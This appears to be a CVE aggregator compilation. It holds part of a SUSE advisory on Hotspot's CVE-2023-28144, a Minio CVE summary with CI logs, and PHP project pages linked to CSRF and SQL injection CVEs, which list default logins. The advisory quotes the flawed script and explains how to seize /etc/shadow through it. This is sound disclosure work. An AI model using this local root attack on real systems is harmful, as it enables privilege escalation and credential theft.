
The script receives the path to a temporary file which is by default safely
created in /tmp via the \`QTemporaryFile\` class in "src/perfrecord.cpp:142".
The script contains the following logic during early startup:

\`\`\`sh
    if \[ ! -z "$1" \]; then
        olduser=$(stat -c '%u' "$1")
        chown "$(whoami)" "$1"
        echo "rewriting to $1"
        # redirect output to file, to enable parsing of output even when
        # the graphical sudo helper like kdesudo isn't forwarding the text properly
        $0 2>&1 | tee -a "$1"
        chown "$olduser" "$1"
        exit
    fi
\`\`\`

The two \`chown\` invocations on the temporary file result in a temporary change
of the ownership of the temporary file to root, which is originally owned by
the unprivileged user. It changes ownership of the provided path first to
\`root\`, then reexecutes itself, then changes ownership back to the original
user.

This offers the following attack vectors:

- giving ownership of an arbitrary file to root
- giving ownership of an arbitrary file to the unprivileged user

The script accepts arbitrary paths and doesn't check where the file is located
and what its ownership is. Thus the path can also be a file in any other
directory. Therefore even without having to win a race condition or using a
symlink attack, an attacker can simply specify a path to an already existing
file owned by root e.g. /etc/shadow, which will in the end be owned by the
unprivileged user.

It can be argued that this script can only be invoked as root if the root
password has been supplied to kdesu, pkexec or the Kauth framework and thus
requires root privileges in the first place. Since the Polkit authentication
framework is likely used though, there is a certain chance that users or
integrators want to get rid of the "annoying" authentication dialog and change
the Polkit policy to something like "yes" for active users to make the
elevation work out of the box. In this case all locally logged in users could
trigger the exploit without authenticating as root.

Potential Fix
=============

I recommended to upstream to replace the currently overly complex privilege
escalation logic, that potentially uses a range of alternate privilege
escalation mechanisms, by a single clean approach like using \`pkexec\`. Towards
the helper script subprocess Pipes should be used for consuming the output
instead of passing a temporary file path to it. This way the problematic
\`chown\` calls will no longer be needed.

At the moment no proper is available and upstream will require more time to
address the issue. Using Polkit and the default upstream Polkit policy there
should not be immediate danger, but users need to be aware that relaxing the
authentication requirements in any way gives way to the local root exploit.

Upstream added a commit \[3\] that allows to "opt-in" the risky authentication
feature during build time.

\[3\]: https://github.com/KDAB/hotspot/commit/65a246ce9196462081483fd07d97678dcfe36b9c

Further Hardening
=================

The privileged operations that the script currently performs are the
following:

    sysctl -wq kernel.kptr\_restrict=0 kernel.perf\_event\_paranoid=-1
    mount -o remount,mode=755 /sys/kernel/debug
    mount -o remount,mode=755 /sys/kernel/debug/tracing

Granting world read access to the debug and tracing file systems is a
bit coarse grained. Sadly these kernel file systems don't support ACL
entries. If that would be possible then temporarily adding a dedicated ACL for
the unprivileged user would have been a viable approach.

I recommended to upstream to investigate the option to use a dedicated hotspot
group that is granted access to the file systems. Furthermore there might be a
possibility to use the capability \`CAP\_PERFMON\` in conjunction with the lower
level \`perf\` tool to obtain the necessary privileges.

Affectedness and CVE Assignment
===============================

The problematic use of \`chown\` in the helper script has been introduced in the
upstream commit 3b4682565f0e53f903f3ad0f3f2c0f236d382efb \[4\] and has been
present since release v1.3.0.

I decided to request a CVE for this issue even though it is likely not
exploitable by default, because of the simplicity of exploiting it and the
complexity of the overall privilege escalation logic in Hotspot. Mitre
assigned CVE-2023-28144 for the issue.

\[4\]: https://github.com/KDAB/hotspot/commit/3b4682565f0e53f903f3ad0f3f2c0f236d382efb

Timeline
========

2023-03-09: I contacted the main upstream author about the vulnerability,
            offering coordinated disclosure.
2023-03-10: The upstream author agreed to publishing the issue without
            embargo time, because there will be no proper fix available in
            the short term. Users should be made aware of the issue right now.

            We discussed various security aspects of the current code and
            potential remedies and improvements.
2023-03-13: I received the CVE from Mitre and started publishing the available
            information.

Best Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (834 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-28144: security - Security issue in Hotspot elevate_perf_privileges.sh (CVE-2023-28144)

Minio is a Multi-Cloud Object Storage framework. Starting with RELEASE.2020-12-23T02-24-12Z and prior to RELEASE.2023-03-13T19-46-17Z, a user with `consoleAdmin` permissions can potentially create a user that matches the root credential `accessKey`. Once this user is created successfully, the root credential ceases to work appropriately. The issue is patched in RELEASE.2023-03-13T19-46-17Z. There are ways to work around this via adding higher privileges to the disabled root user via `mc admin policy set`.

**Mint Automation**

Test

Result

mint-erasure.sh

✔️

mint-compress-encrypt-dist-erasure.sh

❌ more...

mint-pools.sh

❌ more...

**16803-1d1b209/mint-pools.sh.log:**

    Running with
    SERVER_ENDPOINT:      15.15.15.7:31416
    ACCESS_KEY:           minio
    SECRET_KEY:           ***REDACTED***
    ENABLE_HTTPS:         0
    SERVER_REGION:        us-east-1
    MINT_DATA_DIR:        /mint/data
    MINT_MODE:            full
    ENABLE_VIRTUAL_STYLE: 0
    RUN_ON_FAIL:          0
    
    To get logs, run 'docker cp 669afbd10fa0:/mint/log /tmp/mint-logs'
    
    (1/14) Running aws-sdk-go tests ... done in 9 seconds
    (2/14) Running aws-sdk-java tests ... done in 2 seconds
    (3/14) Running aws-sdk-php tests ... done in 42 seconds
    (4/14) Running aws-sdk-ruby tests ... done in 10 seconds
    (5/14) Running awscli tests ... done in 2 minutes and 24 seconds
    (6/14) Running healthcheck tests ... done in 0 seconds
    (7/14) Running mc tests ... done in 18 seconds
    (8/14) Running minio-go tests ... done in 56 seconds
    (9/14) Running minio-java tests ... done in 45 seconds
    (10/14) Running minio-js tests ... FAILED in 1 minutes and 1 seconds
    {
      "name": "minio-js",
      "function": "\"after all\" hook in \"functional tests\"",
      "duration": 7273,
      "status": "FAIL",
      "error": "S3Error: The bucket you tried to delete is not empty at Object.parseError (node_modules/minio/dist/main/xml-parsers.js:71:11) at /mint/run/core/minio-js/node_modules/minio/dist/main/transformers.js:166:22 at DestroyableTransform._flush (node_modules/minio/dist/main/transformers.js:90:10) at DestroyableTransform.prefinish (node_modules/readable-stream/lib/_stream_transform.js:129:10) at prefinish (node_modules/readable-stream/lib/_stream_writable.js:611:14) at finishMaybe (node_modules/readable-stream/lib/_stream_writable.js:620:5) at endWritable (node_modules/readable-stream/lib/_stream_writable.js:643:3) at DestroyableTransform.Writable.end (node_modules/readable-stream/lib/_stream_writable.js:571:22) at IncomingMessage.onend (internal/streams/readable.js:670:10) at endReadableNT (internal/streams/readable.js:1333:12) at processTicksAndRejections (internal/process/task_queues.js:82:21)"
    }
    (10/14) Running minio-py tests ... done in 2 minutes and 21 seconds
    (11/14) Running s3cmd tests ... done in 18 seconds
    (12/14) Running s3select tests ... done in 4 seconds
    (13/14) Running versioning tests ... done in 3 minutes and 20 seconds
    
    Executed 13 out of 14 tests successfully.
    

**16803-1d1b209/mint-compress-encrypt-dist-erasure.sh.log:**

    Running with
    SERVER_ENDPOINT:      15.15.15.8:31036
    ACCESS_KEY:           minio
    SECRET_KEY:           ***REDACTED***
    ENABLE_HTTPS:         0
    SERVER_REGION:        us-east-1
    MINT_DATA_DIR:        /mint/data
    MINT_MODE:            full
    ENABLE_VIRTUAL_STYLE: 0
    RUN_ON_FAIL:          0
    
    To get logs, run 'docker cp 41dc944b6939:/mint/log /tmp/mint-logs'
    
    (1/14) Running aws-sdk-go tests ... done in 8 seconds
    (2/14) Running aws-sdk-java tests ... done in 2 seconds
    (3/14) Running aws-sdk-php tests ... done in 42 seconds
    (4/14) Running aws-sdk-ruby tests ... done in 10 seconds
    (5/14) Running awscli tests ... done in 2 minutes and 23 seconds
    (6/14) Running healthcheck tests ... done in 0 seconds
    (7/14) Running mc tests ... done in 18 seconds
    (8/14) Running minio-go tests ... done in 49 seconds
    (9/14) Running minio-java tests ... done in 31 seconds
    (10/14) Running minio-js tests ... done in 58 seconds
    (11/14) Running minio-py tests ... FAILED in 1 minutes and 6 seconds
    {
      "name": "minio-py:test_put_object",
      "status": "FAIL",
      "args": {
        "bucket_name": "minio-py-test-de11b877-cc95-481a-b403-0229416a8478",
        "object_name": "6bc2e079-6c01-4e61-9c40-35003bf8b1ce-metadata",
        "length": 11534336,
        "data": "LimitedRandomReader(11 * MB)",
        "metadata": {
          "x-amz-meta-testing": "value",
          "test-key": "value2"
        },
        "content_type": "application/octet-stream"
      },
      "message": "('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))",
      "error": "Traceback (most recent call last):\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 703, in urlopen\n    httplib_response = self._make_request(\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 449, in _make_request\n    six.raise_from(e, None)\n  File \"<string>\", line 3, in raise_from\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 444, in _make_request\n    httplib_response = conn.getresponse()\n  File \"/usr/lib/python3.8/http/client.py\", line 1348, in getresponse\n    response.begin()\n  File \"/usr/lib/python3.8/http/client.py\", line 316, in begin\n    version, status, reason = self._read_status()\n  File \"/usr/lib/python3.8/http/client.py\", line 277, in _read_status\n    line = str(self.fp.readline(_MAXLINE + 1), \"iso-8859-1\")\n  File \"/usr/lib/python3.8/socket.py\", line 669, in readinto\n    return self._sock.recv_into(b)\nConnectionResetError: [Errno 104] Connection reset by peer\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File \"/mint/run/core/minio-py/tests.py\", line 126, in _call_test\n    func(log_entry, *args, **kwargs)\n  File \"/mint/run/core/minio-py/tests.py\", line 697, in test_put_object\n    _CLIENT.put_object(bucket_name, object_name + \"-metadata\", reader,\n  File \"/usr/local/lib/python3.8/dist-packages/minio/api.py\", line 1766, in put_object\n    raise exc\n  File \"/usr/local/lib/python3.8/dist-packages/minio/api.py\", line 1725, in put_object\n    upload_id = self._create_multipart_upload(\n  File \"/usr/local/lib/python3.8/dist-packages/minio/api.py\", line 1565, in _create_multipart_upload\n    response = self._execute(\n  File \"/usr/local/lib/python3.8/dist-packages/minio/api.py\", line 403, in _execute\n    return self._url_open(\n  File \"/usr/local/lib/python3.8/dist-packages/minio/api.py\", line 266, in _url_open\n    response = self._http.urlopen(\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/poolmanager.py\", line 376, in urlopen\n    response = conn.urlopen(method, u.request_uri, **kw)\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 787, in urlopen\n    retries = retries.increment(\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/util/retry.py\", line 550, in increment\n    raise six.reraise(type(error), error, _stacktrace)\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/packages/six.py\", line 769, in reraise\n    raise value.with_traceback(tb)\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 703, in urlopen\n    httplib_response = self._make_request(\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 449, in _make_request\n    six.raise_from(e, None)\n  File \"<string>\", line 3, in raise_from\n  File \"/usr/local/lib/python3.8/dist-packages/urllib3/connectionpool.py\", line 444, in _make_request\n    httplib_response = conn.getresponse()\n  File \"/usr/lib/python3.8/http/client.py\", line 1348, in getresponse\n    response.begin()\n  File \"/usr/lib/python3.8/http/client.py\", line 316, in begin\n    version, status, reason = self._read_status()\n  File \"/usr/lib/python3.8/http/client.py\", line 277, in _read_status\n    line = str(self.fp.readline(_MAXLINE + 1), \"iso-8859-1\")\n  File \"/usr/lib/python3.8/socket.py\", line 669, in readinto\n    return self._sock.recv_into(b)\nurllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))\n",
      "duration": 62741
    }
    (11/14) Running s3cmd tests ... done in 16 seconds
    (12/14) Running s3select tests ... done in 4 seconds
    (13/14) Running versioning tests ... done in 3 minutes and 4 seconds
    
    Executed 13 out of 14 tests successfully.
    

Deleting image on docker hub  
Deleting image locally

CVE-2023-27589: Do not allow adding root user to IAM subsystem by harshavardhana · Pull Request #16803 · minio/minio

A Cross-Site Request Forgery (CSRF) in Online Food Ordering System v1.0 allows attackers to change user details and credentials via a crafted POST request.

****Subscribe YouTube** For Latest Update **Click Here********100 + PHP Projects with Source Code** **

Online Food ordering system is a process in which one can order various foods and beverages from some local restaurant and hotels through the use of internet, just by sitting at home or any place. And the order is delivered to the told location.

The Online Food Order System In PHP is a simple project developed using PHP, JavaScript, and CSS. The project connects different restaurants with customers. The project contains an admin(manager) and the user side. All the management like editing site contents, updating food items, adding restaurants, and checking order status can be managed from the admin side. There can be many managers on the site.

For the user section, the users can go through the homepage, about, and contact pages. In order to order the food items, the user has to create an account and sign in or log in. The food comes with the cost as well. This project makes a convenient way for customers to buy/purchase food online, without having to go to the restaurant.

This Online Food Order System is in PHP, JavaScript, and CSS. Talking about the features of this system, it contains the admin(manager) section and the user (customer) section. All the editings, updating, managing order details, food items, and restaurants are from the admin section while customers can only go through the site and give orders if want. The design of this system is simple so that the user won’t get any difficulties while working on it.

This is an Online ordering system written using PHP/MySQL.

****The features of this system are the following:****

\- order product online  
\- upload product design online  
\- add, edit, delete product  
\- send order confirmation via email  
\- manage online order  
\- Ajax hierarchical combobox for payment method.  
\- add delivery charge outside the coverage area  
\- secure reservation  
\- forum for customer comments about the site  
\- generates various report  
\- and many more

****Brief overview of the technology:****

**Front end: HTML, CSS, JavaScript**

1.  HTML: HTML is used to create and save web document. E.g. Notepad/Notepad++
2.  CSS : (Cascading Style Sheets) Create attractive Layout
3.  Bootstrap : responsive design mobile freindly site
4.  JavaScript: it is a programming language, commonly use with web browsers.

**Back end: PHP, MySQL**

1.  PHP: Hypertext Preprocessor (PHP) is a technology that allows software developers to create dynamically generated web pages, in HTML, XML, or other document types, as per client request. PHP is open source software.
2.  MySQL: MySql is a database, widely used for accessing querying, updating, and managing data in databases.

**Software Requirement(any one)**

*   WAMP Server
*   XAMPP Server
*   MAMP Server
*   LAMP Server

****( Make Sure PHP Version 5.5 only)****

Xamp PHP **5.5** download link -  Click Here

****Installation Steps****

1\. Download zip file and Unzip file on your local server.  
2\. Put this file inside "c:/wamp/www/" .  
3\. Database Configuration  
Open phpmyadmin  
Create Database named **food**.  
Import database food.sql from downloaded folder(inside database)  
4\. Open Your browser put inside "http://localhost/OnlineFood ordering system/"

**Admin Login Details**  
Login Id: root  
Password: toor

*   Need Advance Food Ordering Project
*   Click Here

*   Need Installation Help Or Customization
*   Whatsapp +916263056779

CVE-2023-27073: Online Food Ordering System Project in PHP | Projectworlds

BP Monitoring Management System v1.0 was discovered to contain a SQL injection vulnerability via the emailid parameter in the login page.

**BP Monitoring Management System using PHP and MySQL**

BP Monitoring Management System is a web-based application. This application is to maintain the record of the BP details of the family members datewise.

**Project Requirements**

Project Name

BP Monitoring Management System Project in PHP

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In BP monitoring Management Project we use PHP and MySQL Database. BP monitoring Management System has one module i.e user.

**User Module**

**User Registration:** In this section, the user can register himself. A one-time registration is required for every user.

**User login:** In this section, users can log in with a valid email id and password.

**Dashboard:** In this section, the User can view the total listed family members and total BP records count.

**Family Members:** In this section, the user can add, edit and delete the family members.

**BP:** In this section, the user can add, edit and delete the family member BP details.

**Reports:** In this section, the User can generate the b/w dated report of a particular family member.

User can also update their profile, change their password and recover their password.

****Some of the Project Screens****

**User Signup**

**User Dashboard**

**Add BP Details**

**Manage BP Details**

**How to run the BP Monitoring Management System (bpmms) Project**

1\. Download the zip file

2\. Extract the file and copy bpmms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name bpmmsdb

6\. Import bpmmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/bpmms

**Credential for User panel :**

**Username:** john@test.com  
**Password:** Test@123

**View Demo**

**Download BPMMS Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

Tag

#php